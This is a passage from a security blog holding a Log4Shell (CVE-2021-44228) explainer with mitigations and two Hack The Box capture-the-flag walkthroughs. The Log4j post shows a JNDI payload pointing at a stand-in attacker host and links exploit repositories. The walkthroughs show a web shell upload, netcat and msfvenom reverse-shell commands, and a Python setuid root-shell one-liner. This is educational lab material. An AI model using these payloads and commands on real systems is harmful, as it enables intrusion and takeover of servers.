Monday, December 13, 2021

All about Log4j - CVE-2021-44228 Vulnerability | Log4Shell

Log4j
What is Log4j?

What is Log4j Vulnerability and its impact?

Which versions of the Log4j library are vulnerable?

How can it be exploited?

How do you know if you have already been impacted?




On 9th Dec, 2021, a remote code execution (RCE) vulnerability in Apache log4j 2 CVE-2021-44228(Log4Shell) was identified as being exploited in the wild and becoming a full-blown security meltdown, affecting digital systems across the internet. Hackers are already attempting to exploit it, as it is incredibly easy to perform. A specially crafted request is sent to a vulnerable system, depending on the system configuration, an attacker can instruct that system to download and subsequently execute a malicious payload. Hackers all around the world are actively scanning the internet for affected systems. They have already developed tools that automatically attempt to exploit the bug, as well as worms that can spread independently from one vulnerable system to another under the right conditions. There are many servers, both on-premise and within the cloud environment, that are yet to be patched, due to the discovery of this exploit being so recent. This flaw could have serious repercussions worldwide even as fixes emerge.


What is Log4j?


Apache Log4j is a Java-based logging utility originally written by Ceki Gülcü and is a part of the Apache Logging Project. This library is used by Java developers as the usage of this library is one of the easiest ways to log errors. 


Many large software companies and organisations use the Log4j library, including Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter, and many more. Because of the library being so popular, some information security researchers expect a significant increase of the attacks on vulnerable servers over the next few days.


What is Log4j Vulnerability(CVE-2021-44228) and its impact?


Also known as Log4Shell or LogJam, has been discovered in Apache Log4j 2, an open source Java package used to enable logging in many popular applications, and it can be exploited to enable remote code execution on countless servers. Apache Software Foundation says Log4Shell receives the maximum severity rating, 10, on the Common Vulnerability Scoring System (CVSS) scale.


All an attacker has to do to exploit the flaw is strategically send a malicious code string that eventually gets logged by Log4j version 2.0 or higher. The exploit lets an attacker load arbitrary Java code on a server, allowing them to take control.


Minecraft screenshots circulating on forums appear to show players exploiting the vulnerability from the Minecraft chat function. On Friday, some Twitter users began changing their display names to code strings that could trigger the exploit. Another user changed his iPhone name to do the same and submitted the finding to Apple. Researchers told WIRED that the approach could also potentially work using email.


Which versions of the Log4j library are vulnerable?


Affected Version

Apache Log4j 2.x <= 2.15.0-rc1

Almost all versions of Log4j are vulnerable, starting from 2.0-beta9 to 2.14.1. The simplest and most effective protection method is to install the most recent version of the library, 2.15.0. 


Affected Software

A significant number of Java-based applications are using log4j as their logging utility and are vulnerable to this CVE. To the best of our knowledge, at least the following software may be impacted:


  • Apache Struts

  • Apache Solr

  • Apache Druid

  • Apache Flink

  • ElasticSearch

  • Flume

  • Apache Dubbo

  • Logstash

  • Kafka

  • Spring-Boot-starter-log4j2


How can it be exploited?




  • Malicious crafted payload ${jndi:ldap://attacker.com/a} is sent to the server via any header/cookie/parameter.

  • The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server),

  • The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI),

  • This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process.

  • This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.



Researchers have already found evidence that Log4 Shell can be exploited in servers operated by Apple, Cloudflare, Twitter, Valve, Tencent, and other large companies. The vulnerability is said to be particularly easy to exploit in Minecraft servers, too, with some proof of concept attacks using nothing more than the in-game chat.


How to protect your server from attacks?


  1. Update Log4j 2 to the latest version(2.15.0), but when that is not possible, the potentially vulnerable machines should limit outbound access as much as possible.

  2. If for some reason updating the library is not possible, Apache Foundation recommends using one of the mitigation methods. In case of Log4J versions from 2.10 to 2.14.1, they advise setting the log4j2.formatMsgNoLookups system property, or setting the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable to true.

  3. To protect earlier releases of Log4j (from 2.0-beta9 to 2.10.0), the library developers recommend removing the JndiLookup class from the classpath: zip -q -d log4j-core – *. Jar org / apache / logging / log4j / core / lookup / JndiLookup .class.



The situation underscores the challenges of managing risk within interdependent enterprise software. As Minecraft did, many organizations will need to develop their own patches or will be unable to patch immediately because they are running legacy software, like older versions of Java. Additionally, Log4j is not a casual thing to patch in live services because if something goes wrong an organization could compromise their logging capabilities at the moment when they need them most to watch for attempted exploitation. There's not much that average users can do, other than install updates for various online services whenever they're available; most of the work to be done will be on the enterprise side, as companies and organizations scramble to implement fixes.


For immediate remediation, Implement rules at WAF level to block Log4j Attack payloads.


How do you know if you have already been impacted?


To analyse the impact on the current scenario, kindly check the outbound connections from your servers. Multiple outbound protocols can be used to exploit vulnerable systems, so blocking specific ports or hosts may not be sufficient.


For now, the priority is figuring out how widespread the problem truly is. Unfortunately, security teams and hackers alike are working overtime to find the answer. 



Exploits


https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

https://github.com/welk1n/JNDI-Injection-Exploit

https://github.com/tangxiaofeng7/BurpLog4j2Scan

https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept









References - 


https://www.kaspersky.com/blog/log4shell-critical-vulnerability-in-apache-log4j/43124/

https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html

https://www.wired.com/story/log4j-flaw-hacking-internet/amp

https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/


Sunday, October 17, 2021

WAF vs BOT Manager: Do you need both?


We have all heard of Web Application Firewall. What do you picture when you think about WAF? A red coloured wall which protects malicious traffic from getting in. You’re not wrong. Let me tell you what happens inside that red coloured wall. 


In this blog, we will mostly be on the defensive side. We already know how web application attacks are performed, now we will see how firewalls defend it and do we need WAF as well as BOT Manager.


Fun fact - The term firewall originally referred to a wall intended to confine a fire within a line of adjacent buildings.


What is Web Application Firewall?

Monday, October 11, 2021

Secure Development Lifecycle (SDLC) - Part VI

Buffer Overflow Mitigation & Recommendation Technique - Part V


Mitigation / Recommendation Techniques

SEH Based Buffer Overflow Exploit - Part IV


SEH Based Buffer Overflow

Stack Based Buffer Overflow Exploit - Part III


Stack Based Buffer Overflow

Buffer Overflow - Creating Vulnerable Server - Part II

Friday, October 8, 2021

Sunday, August 8, 2021

Love | Hack The Box (HTB) | CTF Walkthrough

Welcome Back! Let's continue with our exploration of Hack the Box (HTB) machines. Love is an easy-rated windows-based box. With that said, let us begin.


Contents
1. Scanning
2. Enumeration
3. Exploiting
4. Privilege Escalation

  1. Scanning
As usual, let's start with Nmap scan to learn more about the services that are running on this machine.
Nmap - One of the most popular port scanner tool which allows us to discover all active ports and services that are running on the target network.
We have 7 ports open, and we can also see some of the domains "staging.love.htb" and "www.love.htb" listed in the Nmap scan.

nmap -sC -sV 10.10.10.239

Exhibit 1
  1. Enumeration
First, let's see what is running on port 80. We have a Voting System asking for credentials to login as shown in the below Exhibit 2.

Exhibit 2

Let’s enumerate the webserver using Dirb. Dirb/Dirbuster is a tool to brute force any directory based on wordlists.
Exhibit 3

Wow, there are a whole lot of directories. The /admin directory seems like an admin panel for the Voting system. But we have not retrieved credentials for admin and default admin passwords are not working. So let us see what the other ports have for us.

When browsing the web service on port 5000, we get :
Exhibit 4


From the Nmap result, we got some interesting subdomains. Let's add this to our /etc/hosts file. We have a sub-domain "staging.love.htb" and "www.love.htb" as shown in the below Exhibit 5.

Exhibit 5

Let us visit staging.love.htb. We have a Free File Scanner hosted in this server as shown in the below Exhibit 6.
Exhibit 6

We have got a page where we can specify the file URL for it to scan.

Exhibit 7

When we provide a URL and click on "Scan file", the server actually displays the website's response.

Since the web service on port 5000 is forbidden to us, maybe we can access it via this. File Scanner service and the port 5000 web service are running on the same server, we might be able to access it via localhost. It is like we are making the server request the service on another port that is running on the same machine also known as Server Side Request Forgery (SSRF).

Exhibit 8

Great! And this time, we are successful in making the request and it reveals some credentials.

User = "admin"
Pass = "@LoveIsInTheAir!!!!"

I tried logging into all the portals we had and finally got access to the admin dashboard.

Exhibit 9

Exhibit 10

When browsing the admin dashboard, I found the profile updating option allowing us to upload a file to the server. How about we try to upload a shell?

Exhibit 11

It looks like we are successful in uploading the shell. The uploaded file was found in /images.  folder.

Exhibit 12

Let's try and run a simple command "whoami" and the server is giving the response.

Exhibit 13

Now it's time to get the reverse shell, let's try simple and upload a nc.exe file in the server in the same way we uploaded our shell.

Exhibit 14

As shown in Exhibit, we can see our file nc.exe is uploaded.

Exhibit 15

Now we need to set up a listener and execute the below command.

#Netcat Listener
nc -nvlp 8888
#Execute netcat command
http://10.10.10.239/images/jagskap.php?cmd=nc.exe%2010.10.15.4%208888%20-e%20cmd.exe

Exhibit 16

Congrats!! We have a shell as user phoebe and we can read the user flag now.
  • Privilege Escalation
Let us begin with WinPEAS.

WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. Upload the file to the server and just run the binary.

Exhibit 17

This will produce a pretty large output. Save the output on a file and for analyzing.

When analyzing, the main part where we might be interested in is :

Exhibit 18

We can see that the AlwaysInstallElevated is set to 1. This means we can install an MSI file with elevated privileges as an administrator. This might be a way to get an administrator on the system.

First, let us create a MSI package that will give us a reverse shell using "msfvenom".

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.15.4 LPORT=7777 -f msi -o reverse.msi

Exhibit 19

Now copy/upload the file to the remote box.

Exhibit 20

Let's set up a listener on the specified port and execute the MSI file using the command below -

# Cross your fingers and listen on netcat
nc -nvlp 7777
# Execute msi file
msiexec /quiet /qn /i reverse.msi

Exhibit 21

BINGO!! And here we get administrator on the system and we have the root flag.

Exhibit 22

Thus, LOVE from HackTheBox has been rooted.

Thanks for reading this far. I hope you liked it.

Wednesday, August 4, 2021

Cap | Hack The Box (HTB) | CTF Walkthrough

Hi Guys!! In this blog we will cover the HTB CTF challenge machine named "Cap" which is an easy machine. Capture the flag (CTF) challenge/games can help you understand many aspects of information security. CTF/HTB challenges are full of learning on new vulnerabilities, RCE, Privilege Escalation, etc.

Contents

1. Scanning
2. Enumeration
3. Exploiting
4. Privilege Escalation


  1. Scanning
First step would be to scan the ports and services running in the target network. One of the most popular port scanner tool is Nmap which allows the attacker to discover all active ports and services running on the target network. Exhibit 1 shows that port 21, 22 and 80 are opened.

nmap -sC -sV 10.10.10.245

Exhibit 1
  1. Enumeration
If you run script (-sC) in nmap or check anonymous login manually, it shows we don’t have access to anonymous ftp.

Exhibit 2

Let's run Nikto and Dirb to see if we get any additional information.

Nikto is a command-line vulnerability scanner that scans web-servers  for dangerous files/CGIs, outdated server software and other problems.

nikto -h http://10.10.10.245/

Exhibit 3

Dirb/Dirbuster is a tool to brute force any directory based on wordlists.

dirb http://10.10.10.245

Exhibit 4

When browsing the website, it displays the result of monitoring of the network. On the left sidebar menu, we can see 5 second PCAP (packet capture) Analysis. The PCAP files contains the data/packets sent over a network.

Exhibit 5

We can also download these files and analysis them later.

Exhibit 6

When browsing http://10.10.10.245/data/4, the application didn’t show any packets. So, I changed the path parameter from 4 to 0.

Exhibit 7

Fortunately, it worked. If it hadn’t worked, we would have start fuzzing rather than testing one by one. Let's downloaded the pcap file and open it in wireshark.

Exhibit 8

We can see the user and password when analysing the 0.pcap.
  1. Exploiting
Let's use the credentials we found in FTP. Credentials are working and we can see user.txt file as well.

Exhibit 9

Let's try to log in to SSH with the same credentials.

ssh nathan@10.10.10.245

Exhibit 10

Congrats, We got the user access and the user’s flag in the home directory.

cat user.txt
  1. Privilege Escalation
Next, when enumerating ways for privilege escalation I found setuid capabilities that could escalate the privileges by giving us the root shell. As shown in the below Exhibit we have cap_setuid available or the python3.8 binary on the target.

getcap -r / 2>/dev/null

Exhibit 11

If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.

A quick search on the capabilities led to the command to execute for root shell.

// https://gtfobins.github.io/gtfobins/python/#capabilities
python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'

BINGO!!! As shown in Exhibit 12, we executed the above command and got the root shell.

Exhibit 12


Hope you learned and enjoyed it!!